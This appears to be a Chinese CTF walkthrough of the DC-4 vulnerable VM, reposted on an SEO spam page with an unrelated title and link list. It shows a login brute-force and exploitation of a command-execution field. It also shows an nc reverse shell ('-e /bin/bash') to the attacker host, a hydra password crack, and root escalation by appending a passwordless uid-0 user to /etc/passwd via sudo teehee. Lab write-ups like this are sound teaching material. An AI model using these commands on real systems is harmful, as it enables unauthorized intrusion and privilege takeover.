当前位置: 首页 > news >正文

珠海网站建设 科速wordpress 步骤

珠海网站建设 科速,wordpress 步骤,辽宁建设厅的证到底在哪个网站查,楚州网站开发攻击机:kali 靶机:DC-4 一,信息收集 1.主机发现 找寻同网段下存活的主机 arp-scan -l2.端口扫描 查看此主机上有哪些开放端口 nmap -sV -p- 192.168.126.136发现22,80端口,远程连接跟网站(大概&…

攻击机:kali

靶机:DC-4

一,信息收集

1.主机发现

找寻同网段下存活的主机

arp-scan -l

在这里插入图片描述

2.端口扫描

查看此主机上有哪些开放端口

nmap -sV -p- 192.168.126.136

在这里插入图片描述

发现22,80端口,远程连接跟网站(大概)

3,目录扫描

查看网站后台目录

 dirsearch -u http://192.168.126.136 

在这里插入图片描述

好像没有发现敏感信息

二,开始渗透

1.用户登录爆破

最开始尝试了几个弱口令没成功一气之下直接开始爆破

打开这个网页

在这里插入图片描述

看提示应该是管理员登录,用户名直接用admin

使用burp抓包

在这里插入图片描述

这里只用爆破密码

在这里插入图片描述

字典网上都不少直接下载top5000的字典

在这里插入图片描述

查看结果发现密码是happy

在这里插入图片描述

成功登录

在这里插入图片描述

试了一下这几个选项发现这个是一个命令执行页面

2.任意命令执行

还是使用burp抓包,发到repeater

在这里插入图片描述

可以看出来这个是通过radio的值进行命令执行

试一下其他命令看行不行,试了一下id,whoami,ip addr之类的都可以执行

在这里插入图片描述

猜测这个应该是没有加任何过滤的任意命令执行

3.反弹shell

因为找到了一个任意命令执行的点,所以开始nc反弹连接

先在kali端进行监听

nc -lvvp 6666

在这里插入图片描述

将burp抓的包中指令的部分改成这个后发送

nc 192.168.126.135 6666 -e /bin/bash 

在这里插入图片描述

成功连接

在这里插入图片描述

发现是www-data用户,权限很低

先升级shell,交互模式,避免意外退出又要重新连接

python -c 'import pty;pty.spawn("/bin/bash")'

4.提权

查看其他的用户看看有没有突破口

转到/home里,这个是Linux的普通用户的位置

在这里插入图片描述

发现有三个用户,尝试了一下,只有jim这个能打开

查看jim文件夹里边

在这里插入图片描述

打开test.sh,看翻译大概就是,要让你暴力去破解
在这里插入图片描述

密码文件应该就是那个old-passowrd.bak

在这里插入图片描述

这个应该是曾经用过的密码,真正的密码应该就在这里面,把这个东西复制到kali里面,然后使用hydra进行爆破

在这里插入图片描述

这个可能会有点慢,要等几分钟,可以看到jim用户登录密码是jibril04

在这里插入图片描述

然后换成jim用户

su jim

输入密码:jibril04登录

打开刚刚没有权限的mbox文件

在这里插入图片描述

意思是我有一个来自root用户的信,所以我们去/var/spool/mail邮箱里面找找去

在这里插入图片描述

发现是charles发来的信息,登录密码:^xHhA&hvim0y

切换到charles用户

在这里插入图片描述

发现还没有root的权限,用 sudo -l 看一下自己有什么权限

在这里插入图片描述

发现有一个teehee,上网搜了一下

teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

用户文件格式为

[注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]
echo "bluechips::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户,这个用户因为uid为0,所以也是root权限

所以添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中

在这里插入图片描述

可以看到这样可以不需要密码登录,并且有root权限

5.找flag

去/root里找到flag.txt

在这里插入图片描述

结束~~

三,总结

teehee提权通过修改passwd文件,添加一个无密码root权限的用户

echo "bluechips::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
http://www.yayakq.cn/news/421745/

相关文章:

  • 湘潭网站建设磐石网络中国最好的网络营销公司
  • 网站开发人员属于什么星乐seo网站关键词排名优化
  • 查国外企业信息的网站2023新闻大事件摘抄
  • 用dedecms 做门户网站国内最好的wordpress主题
  • 泉州企业网站维护制作wordpress pjax
  • 网站建设平台哪个部门管怎么做带数据库的网站
  • 集团网站建设新闻阿里云服务器价格表
  • 网站左边logo图标怎么做中润建设集团有限公司网站群
  • 初学者学做网站怎么学北京手机响应式网站建设设计
  • 公司网站建设攻略贵州城乡和建设厅网站
  • 网站开发及建设专业做互联网招聘的网站有哪些内容
  • 有没有让人做问卷的网站wordpress不能编辑不能新建
  • pc网站 手机网站 微信网站 上海装潢设计网站
  • 什么是网站建设从哪些方面建设网站有名的app开发公司
  • 网站节约化建设网站做电商销售需要注册吗
  • 转运公司网站建设备案的博客网站可以做别的吗
  • 郑州大学网页设计与网站建设网站后台发文章图片链接怎么做
  • 深圳的网站建设公司推荐子网站建设方案
  • 科技术语沙洋县seo优化排名价格
  • 空包网网站怎么做的网站建设期末试题
  • 制作网站的公司叫什么自己在线制作logo免费图片
  • 太原心诺做网站wordpress token插件
  • 便宜网站建设多少钱谷歌chrome
  • 建设银行网站入口seo排名第一的企业
  • 建设部工程造价管理网站网站备案信息变更
  • 网站开发设计比赛创意设计执行提案
  • 仿网站被封怎么办杭州家具网站建设方案
  • 什么叫网站appwordpress微商货源网
  • 学校网站建设源代码手机版网站开发
  • 二级域名的网站备案石家庄seo网络推广